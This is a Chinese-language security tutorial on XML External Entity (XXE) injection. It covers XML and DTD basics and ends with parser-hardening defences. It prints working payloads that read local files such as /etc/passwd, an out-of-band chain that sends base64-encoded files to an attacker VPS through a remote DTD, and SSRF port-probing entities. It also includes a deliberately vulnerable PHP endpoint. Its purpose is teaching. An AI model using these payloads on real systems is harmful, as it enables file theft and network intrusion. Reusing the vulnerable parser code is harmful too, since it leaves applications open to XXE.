|
|
原文链接:漏洞梳理篇之XXE
1.什么是XML XML 模式通常被称为 XML 模式定义(XSD)。它被用来描述和验证 XML 数据的结构和内容。XML 模式定义元素,属性和数据类型。模式元素也支持命名空间。它类似于描述数据库中数据的数据库模式。
1.1元素
XML 元素指的是从(且包括)开始标签直到(且包括)结束标签的部分。元素可包含其他元素、文本或者两者的混合物。元素也可以拥有属性。如:
- <bookstore>
- <book category="CHILDREN">
- <title>Harry Potter</title>
- <author>J K. Rowling</author>
- <year>2005</year>
- <price>29.99</price>
- </book>
- <book category="WEB">
- <title>Learning XML</title>
- <author>Erik T. Ray</author>
- <year>2003</year>
- <price>39.95</price>
- </book>
- </bookstore>
在上例中,<bookstore> 和 <book> 都拥有*元素内容*,因为它们包含了其他元素。<author>只有*文本内容*,因为它仅包含文本。另外,只有 <book> 元素拥有*属性* (category="CHILDREN")。
1.2 属性
XML 元素可以在开始标签中包含属性,类似 HTML。属性 (Attribute) 提供关于元素的额外(附加)信息。
- <file type="gif">computer.gif</file>
1.3 实体
实体是对数据的引用;根据实体种类的不同,XML 解析器将使用实体的替代文本或者外部文档的内容来替代实体引用。
XML 中的实体用于表示特殊字符(通常难以或不可能在标准键盘上输入),重用 XML 代码段,将文档组织为几个文件,以及简化 DTD 的编写。
- ' 是一个撇号:'
- & 是一个与字符:&
- " 是一个引号:"
- < 是一个小于号:<
- > 是一个大于号:>
外部实体的概念:
外部实体表示外部文件的内容。外部实体引用其他文件
- <!ENTITY chap1 SYSTEM "chapter-1.xml">
- <!ENTITY chap2 SYSTEM "chapter-2.xml">
- <!ENTITY chap3 SYSTEM "chapter-3.xml">
1.4 PCDATA
PCDATA是XML解析器解析的文本数据使用的一个术语。XML 文档中的文本通常解析为字符数据,或者(按照文档类型定义术语)称为 PCDATA。XML 解析器通常会解析 XML 文档中所有的文本。当某个 XML 元素被解析时,其标签之间的文本也会被解析:
- <message>This text is also parsed</message>
- <name><first>Bill</first><last>Gates</last></name>
- <name>
- <first>Bill</first>
- <last>Gates</last>
- </name>
1.5 CDATA
CDATA 指的是不应由 XML 解析器进行解析的文本数据(Unparsed Character Data)。在 XML 元素中,"<" (新元素的开始)和 "&" (字符实体的开始)是非法的。某些文本,比如 JavaScript 代码,包含大量 "<" 或 "&" 字符。为了避免错误,可以将脚本代码定义为CDATA。CDATA 部分中的所有内容都会被解析器忽略。CDATA 部分由 "" 结束。
术语 CDATA 是不应该由 XML 解析器解析的文本数据。像 "<" 和 "&" 字符在 XML 元素中都是非法的。"<" 会产生错误,因为解析器会把该字符解释为新元素的开始。"&" 会产生错误,因为解析器会把该字符解释为字符实体的开始。某些文本,比如 JavaScript 代码,包含大量 "<" 或 "&" 字符。为了避免错误,可以将脚本代码定义为CDATA。CDATA 部分中的所有内容都会被解析器忽略。CDATA 部分由 "" 结束:
- <script>
- <![CDATA[
- function matchwo(a,b)
- {
- if (a < b && a < 0) then
- {
- return 1;}
- else
- {
- return 0;}
- }
- ]]>
- </script>
2.什么是DTD
文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。
2.1内部的 DOCTYPE 声明
假如 DTD 被包含在您的 XML 源文件中,它应当通过下面的语法包装在一个 DOCTYPE 声明中:
- <!DOCTYPE root-element [element-declarations]>
- <?xml version="1.0" ?>
- <! DOCTYPE note [
- <!ELEMENT note (to,from,heading,body)>
- <!ELEMENT to (#PCDATA)>
- <!ELEMENT from (#PCDATA)>
- <!ELEMENT heading (#PCDATA)>
- <!ELEMENT body (#PCDATA)>
- ]>
- <note>
- <to>Tove</to>
- <from>Jani</from>
- <heading>Reminder</heading>
- <body>Don't forget me this weekend!</body>
- </note>
- !DOCTYPE note (第二行)定义此文档是 note 类型的文档。
- !ELEMENT note (第三行)定义 note 元素有四个元素:"to、from、heading,、body"
- !ELEMENT to (第四行)定义 to 元素为 "#PCDATA" 类型
- !ELEMENT from (第五行)定义 from 元素为 "#PCDATA" 类型
- !ELEMENT heading (第六行)定义 heading 元素为 "#PCDATA" 类型
- !ELEMENT body (第七行)定义 body 元素为 "#PCDATA" 类型
2.2外部文档声明
假如 DTD 位于 XML 源文件的外部,那么它应通过下面的语法被封装在一个 DOCTYPE 定义中:
- <!DOCTYPE root-element SYSTEM "filename">
- <?xml version="1.0"?>
- <!DOCTYPE note SYSTEM "note.dtd">
- <note>
- <to>Tove</to>
- <from>Jani</from>
- <heading>Reminder</heading>
- <body>Don't forget me this weekend!</body>
- </note>
- <! DOCTYPE note [
- <!ELEMENT note (to,from,heading,body)>
- <!ELEMENT to (#PCDATA)>
- <!ELEMENT from (#PCDATA)>
- <!ELEMENT heading (#PCDATA)>
- <!ELEMENT body (#PCDATA)>
- ]>
2.3 DTD实体
DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量
- 实体引用是对实体的引用
- 实体可在内部或外部进行声明
可分为内部实体和外部实体
也可以分为一般实体和参数实体(内部外部都有)
- 一般实体(格式:&实体引用名;)
- 参数实体(格式:%实体引用名;)
内部实体声明
- # 语法:
- <!ENTITY entity-name "entity-value">
- <!ENTITY writer "Donald Duck.">
- <!ENTITY copyright "Copyright runoob.com">
- <author>&writer;©right;</author>
- <!ENTITY % an-element "<!ELEMENT mytag (subtag)>">
- <!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd">
- %an-element; %remote-dtd;
- <author>%writer;%copyright;</author>
- #一般实体格式:
- <!ENTITY 实体名称 "实体的值">
- <!ENTITY writer SYSTEM "http://somewhere.example.org/remote.dtd">
- <!ENTITY copyright SYSTEM "http://somewhere.example.org/remote.dtd">
- <author>&writer;©right;</author>
- <?xml version="1.0"?>
- <!DOCTYPE test [
- <!ENTITY % writer SYSTEM "http://somewhere.example.org/remote.dtd">
- <!ENTITY % copyright SYSTEM "http://somewhere.example.org/remote.dtd">
- ]>
- <author>%writer;%copyright;</author>
外部实体默认支持的协议
 
而且PHP在安装扩展后还能支持下面的协议:
3.XXE攻击
3.1 什么是XXE
XXE(XML外部实体注入,XML External Entity) ,在应用程序解析XML输入时,当允许引用外部实体 时,可构造恶意内容,导致读取任意文件、探测内网端口、攻击内网网站、发起DoS拒绝服务攻击、执 行系统命令等。
3.2 如何构建XXE
①通过DTD外部实体声明进行攻击
- <?xml version="1.0"?>
- <!DOCTYPE a[
- <!ENTITY ali SYSTEM "file:///etc/passwd">
- ]>
- <a>&ali;</a>
- <?xml version="1.0"?>
- <!DOCTYPE go [
- <!ENTITY ali SYSTEM "http://xmltest.com/xml.dtd">
- ]>
- <a>&ali;</a>
- #http://xmltest.com/xml.dtd内容如下
- <!ENTITY ali SYSTEM "file:///etc/passwd">
3.3 XXE漏洞利用
①本地任意文件读取(有回显),在服务器上面将doLogin.php修改为如下:
- <?php
- libxml_disable_entity_loader (false);
- $xmlfile = file_get_contents('php://input');
- $dom = new DOMDocument();
- $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
- $creds = simplexml_import_dom($dom);
- echo $creds;
- ?>
- <?xml version="1.0" encoding="utf-8"?>
- <!DOCTYPE creds [
- <!ENTITY ali SYSTEM "file:///c:/windows/system.ini"> ]>
- <creds>&ali;</creds>
可以看到文件成功读取,但是可以看到读取的文件中并没有特殊符号,如果文件存在符号呢?
尝试文件读取:
发现当腰读取的文件中有特殊符回报错,无法读取到想要的文件。此时使用 CDATA解决报错问题,我们将读出来的数据,放在CDATA中输出即可;CDATA 部分中的所有内容都会被解析器忽略。在前面有讲到:
在 XML 元素中,"<" (新元素的开始)和 "&" (字符实体的开始)是非法的。某些文本,比如 JavaScript 代码,包含大量 "<" 或 "&" 字符。为了避免错误,可以将脚本代码定义为 CDATA。
https://mp.weixin.qq.com/cgi-bin ... 8616&lang=zh_CN
使用payload:
- <?xml version="1.0" encoding="utf-8"?>
- <!DOCTYPE roottag [
- <!ENTITY % start "<![CDATA[">
- <!ENTITY % goodies SYSTEM "file:///d:/test.txt">
- <!ENTITY % end "]]>">
- <!ENTITY % dtd SYSTEM "http://ip/evil.dtd">
- %dtd; ]>
- <roottag>&all;</roottag>
- <?xml version="1.0" encoding="UTF-8"?>
- <!ENTITY all "%start;%goodies;%end;">
②本地任意文件读取(无回显)
在正常的环境中,使用XXE读取文件的时候,是没有回显的,这个时候呢可以把数据外带出来。除了发起请求以外,还得把我们的数据传出去,而且我们本身的数据也是一个对外的请求;所以就要对外请求两次,一次请求获取我们的数据,另外一次请求传送出我们的数据。使用参数实体进行实体引用了。
XXE_1.php
- <?php
- libxml_disable_entity_loader (false);
- $xmlfile = file_get_contents('php://input');
- $dom = new DOMDocument();
- $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
- ?>
- <!ENTITY % all "<!ENTITY % send SYSTEM 'http://vps的ip:端口/%file;'>">
- %all;
然后在VPS上开启http服务,端口为test.dtd中的端口。payload:
- <!DOCTYPE message [
- <!ENTITY % remote SYSTEM "http://VPS的http服务/test.dtd">
- <!ENTITY % file SYSTEM "php://filter/read=convert.base64-
- encode/resource=file:///C:/test.txt">
- %remote;
- %int;
- %send;
- ]>
这里用到base64编码,是因为避免读取数据时候,遇到空格无法读出
解密:
被攻击者:
可以看看调用的过程:
我们从 payload 中能看到 连续调用了三个参数实体 %remote;%int;%send;,这就是我们的利用顺序, %remote 先调用,调用后请求远程服务器上的 test.dtd ,有点类似于将 test.dtd 包含进来,然后 %int 调用 test.dtd 中的 %file, %file 就会去获取服务器上面的敏感文件,然后将 %file 的结果填 入到 %send 以后(因为实体的值中不能有 %, 所以将其转成html实体编码 %),我们再调用 %send; 把我们的读取到的数据发送到我们的远程 vps 上,这样就实现了外带数据的效果,完美的解决了 XXE 无回 显的问
-https://xz.aliyun.com/t/3357#toc-9
刚刚使用的Blind OOB XXE攻击方法,是通过file协议读取本地文件,前面也写到每个语言也可以使用多 种协议(见 2.3.2外部实体声明----外部实体默认支持的协议)
③探测内网
通过前面的Blind OOB XXE方法可以看出,也可以进行SSRF,XXE 也是一种 SSRF 的攻击手法。可以进行内网的地址、端口的探测 可以利用服务器响应时间的长短来判断端口是否被开启
- <?xml version="1.0" encoding="utf-8"?><!DOCTYPE note[
- <!ENTITY ali SYSTEM "http://ip:port">
- ]>
- <reset><login>&ali;</login><secret>Any bugs?</secret></reset>
探测80端口,显示信息如下:
探测3389端口,时间响应很久,可以看出3389端口并未打开
也可以查看响应包确认端口是否开放,通过返回的“HTTP request failed” 可以知道445端口是关闭的
4.XXE的防御
①使用开发语言提供的禁用外部实体的方法
PHP:
- libxml_disable_entity_loader(true);
- DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
- dbf.setExpandEntityReferences(false);
- from lxml import etree
- xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
②过滤用户提交的XML数据
对变量:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC进行过滤
③检查所使用的底层xml解析库,默认禁止外部实体的解析
|
|
发表于 2020-11-9 09:22:47